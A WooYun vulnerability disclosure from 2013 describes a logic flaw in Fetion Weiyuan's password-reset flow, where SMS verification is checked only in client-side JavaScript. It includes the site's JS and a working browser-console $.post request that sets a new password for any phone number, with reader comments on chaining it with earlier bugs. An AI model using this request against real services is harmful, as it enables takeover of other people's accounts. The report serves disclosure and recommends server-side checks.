当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037365

漏洞标题:飞信位缘某处设计缺陷可修改任意用户密码(非爆破)

相关厂商:139移动互联

漏洞作者: 索马里的海贼

提交时间:2013-09-17 12:16

修复时间:2013-09-22 12:17

公开时间:2013-09-22 12:17

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-17: 细节已通知厂商并且等待厂商处理中
2013-09-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

额。。为什么还有3呢。。。。。

详细说明:

注册 登陆 都绕过了 为什么还有三呢
如果是已经注册的用户该怎么弄到他的号呢,找回密码
来看看找回密码的逻辑

function stepSubmit(){
var phone=$.trim($("#phone").val());
var validatecode=$.trim($("#validatecode").val());
if(phone==null||phone==""){
	alert('请输入手机号');
	return;
}
if(validatecode==null||validatecode==""){
	alert('请输入验证码');
	return;
}
$.ajax({
  	url: '/passport/passport/getPasswordStep.action?flag=phone&validatecode='+$.trim($("#validatecode").val())+'&phone='+$.trim($("#phone").val())+'&match='+Math.random(),
   	type: "POST",
   	success: function(res){  
  		var jsonObj = eval("(" + res + ")");
  		var resData=jsonObj.PasswordResult;
		if(resData=="3"){
			alert("本日内您已经下发3次,请明天再试");
			return;
		} else if(resData=="-1"){
			alert("下发短信失败,请稍后再试");
			return;
		}else if(resData=="0"||resData=="1"||resData=="2"){
			alert("短信验证码发送成功!");//下发成功就直接跳了 那不管下发了 直接跟到下一个页面
			window.location= '/passport/passport/getpassword1.action?mobile=' + phone;
		}else{
  			reload_imaP();
			alert(jsonObj.PasswordResult);
			return;
  		}
	}
})
}


直接打开/passport/passport/getpassword1.action?mobile=13622222222

function validate(){
var phoneValidate=$.trim($("#mobile").val());
if(phoneValidate==null||phoneValidate==""){
alert('请输入手机验证码');
	return;
}
$.ajax({
   url: '/passport/passport/codeValidate.action?flag=login&value='+$.trim($("#mobile").val())+'&phone='+mobile+'&match='+Math.random(),
	   type: "POST",
   success: function(res)
   {
	  var jsonObj = eval("(" + res + ")");
		var resData=jsonObj.PasswordResult;
	   if( jsonObj.code == "false")
	   {	
		   if(resData=="1"){
			   alert('验证码超时失效');
			}else{	   
				alert('请输入正确验证码');
			}
			return;
	   }
	   else
	   {	 
		   window.location= '/passport/passport/getpassword2.action'; //我去 又直接跳了
	   }
   },
   failure: function(res){
	alert('请输入正确验证码');
	return;
	}
});
}


再跟到下一个页面/passport/passport/getpassword2.action

function changePwd(){
var first=$.trim($("#newPassword").val());
var second=$.trim($("#pnewPassword").val());
//省略
var mobile = '13622222222';
//省略
var params = {};
params["newpassword"] = first;
params["mobile"] = mobile;
$.ajax({
  	url: '/passport/passport/changePwd.action', 
  	type:"post",
  	dataType:"text", 
  	data:params, 
  	error:function () {
		alert("error");
	},
   	success: function(res){
    var jsonObj = eval("(" + res + ")");
  	var resData=jsonObj.PasswordResult;
  		
  	 	if(resData== "ok"){			//这。。。我了个去
  	 		alert("修改成功");
  	 		
  	 	 setTimeout('jumpPage()',1000);
  	 	}else if(resData== "false"){
  	 		alert("修改失败");
	  	 }else{
  	 		alert(resData);
		}
	}
})
}


最后提交修改密码的步骤 只提交了手机号和新密码 短验又无视了

漏洞证明:

直接打开http://lbs.feixin.10086.cn//passport/passport/getpassword2.action
其实不打开这个页面都无所谓

reset.png


f12 console
$.post('/passport/passport/changePwd.action', 'mobile=13622222222&newpassword=a!11111111',function(data){alert(data);});

reset2.png


回车走你

reset3.png


这是成功了吧,拿新密码用上一个绕过短验登陆的exp测试 OK 又进去了
终于完了 不会有四了 这仨漏洞加一块已经秒杀所有用户了

修复方案:

关键逻辑在服务端做判断

版权声明:转载请注明来源 索马里的海贼@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-22 12:17

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2013-09-17 12:18 | 索马里的海贼 ( 普通白帽子 | Rank:254 漏洞数:24 | http://tieba.baidu.com/f?kw=WOW)

    @xsser 不是这样的啊。。。。

  2. 2013-09-17 12:25 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    你是注定要做海贼王的男淫啊~

  3. 2013-09-17 12:26 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @索马里的海贼 虾米意思

  4. 2013-09-17 12:27 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @xsser 他肯定说你们改了他的标题,汪汪汪思密达

  5. 2013-09-17 12:28 | 索马里的海贼 ( 普通白帽子 | Rank:254 漏洞数:24 | http://tieba.baidu.com/f?kw=WOW)

    @xsser 三个漏洞连起来看是可以控制所有用户的啊。。。并不是只能修改已知账号的用户 不看前面漏洞的话 厂商可以说你改了密码也没用 登陆还有短验呢。。。。

  6. 2013-09-17 12:38 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @索马里的海贼 前两个不配合这个 是没什么影响的

  7. 2013-09-17 12:40 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @索马里的海贼 你好,私信你了,建议这种多个问题配合才能发挥作用漏洞尽量一起提交

  8. 2013-09-17 12:43 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    飞信位缘这东西本身没啥用,漏洞倒不少……

  9. 2013-09-17 12:49 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    @索马里的海贼 在审核时,只见到前两个漏洞确实是无太大影响,如果一定要拆分提交,请注明是多个问题配合利用。

  10. 2013-09-17 12:53 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Finger 编辑辛苦鸟

  11. 2013-09-17 12:58 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    PS:请大家谅解,需要审核的漏洞量很大,在审核的过程中或多或少会有疏忽或误判的地方,如果有什么问题及疑问可以私信我。

  12. 2013-09-17 13:17 | 索马里的海贼 ( 普通白帽子 | Rank:254 漏洞数:24 | http://tieba.baidu.com/f?kw=WOW)

    @Finger 主要是把JS丢上来 3个写一块儿的话太长 因为是三个问题 所以拆开写了前两个也不是完全没影响 至少说绕过正常的逻辑了就是安全问题吧。

  13. 2013-09-17 13:21 | 索马里的海贼 ( 普通白帽子 | Rank:254 漏洞数:24 | http://tieba.baidu.com/f?kw=WOW)

    我看出来了 @Finger比@xsser有用 哈哈

  14. 2013-09-18 11:10 | terrying ( 实习白帽子 | Rank:59 漏洞数:15 | 雅蠛蝶)

    目测洞主是****

  15. 2013-09-23 17:40 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    索马里的海贼。。以前WOW吧吧主的ID。。。